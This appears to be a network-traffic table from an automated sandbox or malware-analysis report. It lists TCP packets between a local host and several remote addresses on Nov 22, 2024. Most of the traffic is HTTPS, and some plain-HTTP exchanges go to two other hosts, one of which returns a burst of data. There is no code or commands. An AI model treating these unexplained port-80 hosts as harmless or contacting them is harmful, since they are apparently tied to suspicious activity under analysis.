Nov 22, 2024 20:36:04.392163992 CET	49775	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.392175913 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.392194986 CET	49775	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.392199993 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.395157099 CET	49781	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.395205975 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.395273924 CET	49781	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.395392895 CET	49781	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.395409107 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.596995115 CET	49782	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:04.672280073 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.672450066 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.672642946 CET	49777	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.672739029 CET	49777	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.672739029 CET	49777	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.672782898 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.672813892 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.675038099 CET	49783	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.675075054 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.675152063 CET	49783	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.675298929 CET	49783	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.675322056 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.716645956 CET	80	49782	185.215.113.43	192.168.2.4
Nov 22, 2024 20:36:04.716893911 CET	49782	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:04.717155933 CET	49782	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:04.837261915 CET	80	49782	185.215.113.43	192.168.2.4
Nov 22, 2024 20:36:06.029238939 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.029829979 CET	49778	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.029865026 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.030392885 CET	49778	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.030399084 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.094841003 CET	80	49782	185.215.113.43	192.168.2.4
Nov 22, 2024 20:36:06.094921112 CET	49782	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:06.139784098 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.140816927 CET	49779	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.140875101 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.141283989 CET	49779	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.141308069 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.172020912 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.172456026 CET	49780	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.172477961 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.172801971 CET	49780	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.172806978 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.262166977 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.262758017 CET	49781	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.262785912 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.263175011 CET	49781	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.263181925 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.474116087 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.474266052 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.474359989 CET	49778	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.474451065 CET	49778	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.474451065 CET	49778	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.474498987 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.474530935 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.477124929 CET	49784	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.477193117 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.477289915 CET	49784	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.477449894 CET	49784	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.477466106 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.528363943 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.528906107 CET	49783	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.528932095 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.529347897 CET	49783	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.529356956 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.605757952 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.605926991 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.606036901 CET	49779	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.606125116 CET	49779	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.606168985 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.606209040 CET	49779	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.606225014 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.608467102 CET	49785	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.608525991 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.608602047 CET	49785	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.615978956 CET	49785	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.616018057 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.627451897 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.627511978 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.627573013 CET	49780	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.627700090 CET	49780	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.627716064 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.627726078 CET	49780	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.627731085 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.630422115 CET	49786	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.630479097 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.630661011 CET	49786	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.630717039 CET	49786	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.630729914 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.723952055 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.724006891 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.724067926 CET	49781	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.724241018 CET	49781	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.724263906 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.724277973 CET	49781	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.724282980 CET	443	49781	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.726954937 CET	49787	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.727018118 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.727091074 CET	49787	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.727252007 CET	49787	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.727267981 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.982469082 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.982594013 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.982665062 CET	49783	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.982882023 CET	49783	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.982897043 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.982904911 CET	49783	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.982909918 CET	443	49783	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.985493898 CET	49788	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.985572100 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:06.985682964 CET	49788	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.985845089 CET	49788	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:06.985874891 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:07.092866898 CET	49724	80	192.168.2.4	93.184.221.240
Nov 22, 2024 20:36:07.220913887 CET	80	49724	93.184.221.240	192.168.2.4
Nov 22, 2024 20:36:07.221000910 CET	49724	80	192.168.2.4	93.184.221.240
Nov 22, 2024 20:36:07.609003067 CET	49782	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:07.609308958 CET	49789	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:07.729947090 CET	80	49789	185.215.113.43	192.168.2.4
Nov 22, 2024 20:36:07.730081081 CET	49789	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:07.730245113 CET	49789	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:07.730423927 CET	80	49782	185.215.113.43	192.168.2.4
Nov 22, 2024 20:36:07.730487108 CET	49782	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:07.849836111 CET	80	49789	185.215.113.43	192.168.2.4
Nov 22, 2024 20:36:08.338124990 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.338571072 CET	49784	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.338609934 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.338980913 CET	49784	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.338995934 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.455558062 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.456031084 CET	49785	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.456056118 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.456448078 CET	49785	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.456451893 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.490915060 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.491255045 CET	49786	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.491278887 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.491590977 CET	49786	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.491602898 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.521653891 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.521970034 CET	49787	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.521986961 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.522300959 CET	49787	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.522305965 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.781220913 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.781783104 CET	49788	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.781857014 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.782182932 CET	49788	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.782196999 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.801637888 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.801703930 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.801867008 CET	49784	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.802094936 CET	49784	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.802133083 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.802171946 CET	49784	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.802192926 CET	443	49784	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.804924011 CET	49790	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.805027008 CET	443	49790	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.805107117 CET	49790	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.805236101 CET	49790	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.805260897 CET	443	49790	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.890959024 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.891031981 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.891110897 CET	49785	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.891297102 CET	49785	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.891326904 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.891340017 CET	49785	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.891345978 CET	443	49785	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.893717051 CET	49791	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.893764973 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.893834114 CET	49791	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.893953085 CET	49791	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.893959999 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.944214106 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.944274902 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.944341898 CET	49786	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.944518089 CET	49786	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.944556952 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.944582939 CET	49786	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.944597960 CET	443	49786	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.947525024 CET	49792	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.947572947 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.947643995 CET	49792	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.947783947 CET	49792	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.947810888 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.965713978 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.965770006 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.965822935 CET	49787	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.966000080 CET	49787	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.966020107 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.966028929 CET	49787	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.966033936 CET	443	49787	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.969786882 CET	49793	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.969810963 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:08.969865084 CET	49793	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.970094919 CET	49793	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:08.970105886 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:09.122832060 CET	80	49789	185.215.113.43	192.168.2.4
Nov 22, 2024 20:36:09.123167038 CET	49789	80	192.168.2.4	185.215.113.43
Nov 22, 2024 20:36:09.127270937 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:09.225263119 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:09.225361109 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:09.225441933 CET	49788	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:09.225610018 CET	49788	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:09.225639105 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:09.225656033 CET	49788	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:09.225662947 CET	443	49788	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:09.228897095 CET	49795	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:09.228985071 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:09.229085922 CET	49795	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:09.229254961 CET	49795	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:09.229286909 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:09.246917009 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:09.247013092 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:09.247175932 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:09.366743088 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.613560915 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.614207029 CET	49791	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:10.614227057 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.614793062 CET	49791	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:10.614799023 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.652347088 CET	443	49790	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.652863026 CET	49790	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:10.652930021 CET	443	49790	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.653430939 CET	49790	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:10.653454065 CET	443	49790	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.680845976 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.680927038 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.680960894 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681006908 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.681045055 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681088924 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.681092978 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681137085 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.681157112 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681200981 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.681202888 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681242943 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.681252003 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681297064 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.681299925 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681339979 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.681344986 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681391001 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.681396008 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.681452036 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.700830936 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.701423883 CET	49793	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:10.701442003 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.702255011 CET	49793	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:10.702261925 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.731709957 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.745364904 CET	49792	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:10.745388985 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.745954990 CET	49792	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:10.745960951 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:10.801309109 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.801429033 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.801626921 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.805429935 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.805501938 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.805507898 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.805547953 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.891396046 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.891520023 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.891536951 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.891588926 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.895463943 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.895524025 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.895597935 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.895642996 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.904088020 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.904145956 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.904257059 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.912456989 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.912524939 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.912527084 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.912571907 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.920684099 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.920737982 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.920754910 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.920798063 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.929106951 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.929164886 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.929169893 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.929218054 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.937608957 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.937661886 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.937691927 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.937732935 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.945813894 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.945867062 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.945904970 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.945944071 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.953212976 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.953263998 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.953265905 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.953304052 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.960376978 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.960448027 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.960525990 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.960576057 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.967629910 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.967679024 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.967725039 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.967767954 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.974854946 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.974920988 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:10.974939108 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:10.974977970 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.015881062 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.016438961 CET	49795	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.016516924 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.016880035 CET	49795	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.016894102 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.051203012 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.051287889 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.051331997 CET	49791	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.051531076 CET	49791	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.051554918 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.051563978 CET	49791	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.051569939 CET	443	49791	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.054740906 CET	49796	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.054796934 CET	443	49796	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.054862022 CET	49796	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.055013895 CET	49796	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.055026054 CET	443	49796	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.102313995 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.102396965 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.102396965 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.102453947 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.104662895 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.104711056 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.104787111 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.104826927 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.107714891 CET	443	49790	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.107768059 CET	443	49790	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.107831001 CET	49790	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.108001947 CET	49790	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.108047962 CET	443	49790	13.107.246.63	192.168.2.4
